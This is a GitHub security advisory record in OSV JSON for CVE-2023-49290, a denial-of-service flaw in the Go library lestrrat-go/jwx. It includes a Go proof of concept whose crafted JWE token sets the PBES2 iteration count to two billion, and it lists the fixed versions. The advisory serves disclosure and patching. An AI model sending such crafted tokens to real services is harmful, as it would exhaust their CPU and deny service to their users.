{"id":"GHSA-7f9x-gw85-8grf","summary":"lestrrat-go/jwx's malicious parameters in JWE can cause a DOS","details":"### Summary\ntoo high p2c parameter in JWE's alg PBES2-* could lead to a DOS attack\n\n### Details\nThe JWE key management algorithms based on PBKDF2 require a JOSE Header Parameter called p2c (PBES2 Count). This parameter dictates the number of PBKDF2 iterations needed to derive a CEK wrapping key. Its primary purpose is to intentionally slow down the key derivation function, making password brute-force and dictionary attacks more resource- intensive.\nTherefore, if an attacker sets the p2c parameter in JWE to a very large number, it can cause a lot of computational consumption, resulting in a DOS attack\n\n### PoC\n```go\npackage main\n\nimport (\n\t\"fmt\"\n\t\"github.com/lestrrat-go/jwx/v2/jwa\"\n\t\"github.com/lestrrat-go/jwx/v2/jwe\"\n\t\"github.com/lestrrat-go/jwx/v2/jwk\"\n)\n\nfunc main() {\n\ttoken := []byte(\"eyJhbGciOiJQQkVTMi1IUzI1NitBMTI4S1ciLCJlbmMiOiJBMjU2R0NNIiwicDJjIjoyMDAwMDAwMDAwLCJwMnMiOiJNNzczSnlmV2xlX2FsSXNrc0NOTU9BIn0=.S8B1kXdIR7BM6i_TaGsgqEOxU-1Sgdakp4mHq7UVhn-_REzOiGz2gg.gU_LfzhBXtQdwYjh.9QUIS-RWkLc.m9TudmzUoCzDhHsGGfzmCA\")\n\tkey, err := jwk.FromRaw([]byte(`abcdefg`))\n\tpayload, err := jwe.Decrypt(token, jwe.WithKey(jwa.PBES2_HS256_A128KW, key))\n\tif err == nil {\n\t\tfmt.Println(string(payload))\n\t}\n}\n\n```\n\n### Impact\nIt's a kind of Dos attack, the user's environment could potentially utilize an excessive amount of CPU resources.\n","aliases":["CVE-2023-49290","GO-2023-2379"],"modified":"2026-07-17T21:11:13.525421101Z","published":"2023-12-05T23:29:26Z","database_specific":{"cwe_ids":["CWE-400"],"severity":"MODERATE","github_reviewed":true,"github_reviewed_at":"2023-12-05T23:29:26Z","nvd_published_at":"2023-12-05T00:15:09Z"},"references":[{"type":"WEB","url":"https://github.com/lestrrat-go/jwx/security/advisories/GHSA-7f9x-gw85-8grf"},{"type":"ADVISORY","url":"https://nvd.nist.gov/vuln/detail/CVE-2023-49290"},{"type":"WEB","url":"https://github.com/lestrrat-go/jwx/commit/64f2a229b8e18605f47361d292b526bdc4aee01c"},{"type":"PACKAGE","url":"https://github.com/lestrrat-go/jwx"}],"affected":[{"package":{"name":"github.com/lestrrat-go/jwx","ecosystem":"Go","purl":"pkg:golang/github.com/lestrrat-go/jwx"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"1.2.27"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-7f9x-gw85-8grf/GHSA-7f9x-gw85-8grf.json"}},{"package":{"name":"github.com/lestrrat-go/jwx/v2","ecosystem":"Go","purl":"pkg:golang/github.com/lestrrat-go/jwx/v2"},"ranges":[{"type":"SEMVER","events":[{"introduced":"0"},{"fixed":"2.0.18"}]}],"database_specific":{"source":"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/12/GHSA-7f9x-gw85-8grf/GHSA-7f9x-gw85-8grf.json"}}],"schema_version":"1.9.0","severity":[{"type":"CVSS_V3","score":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"}]}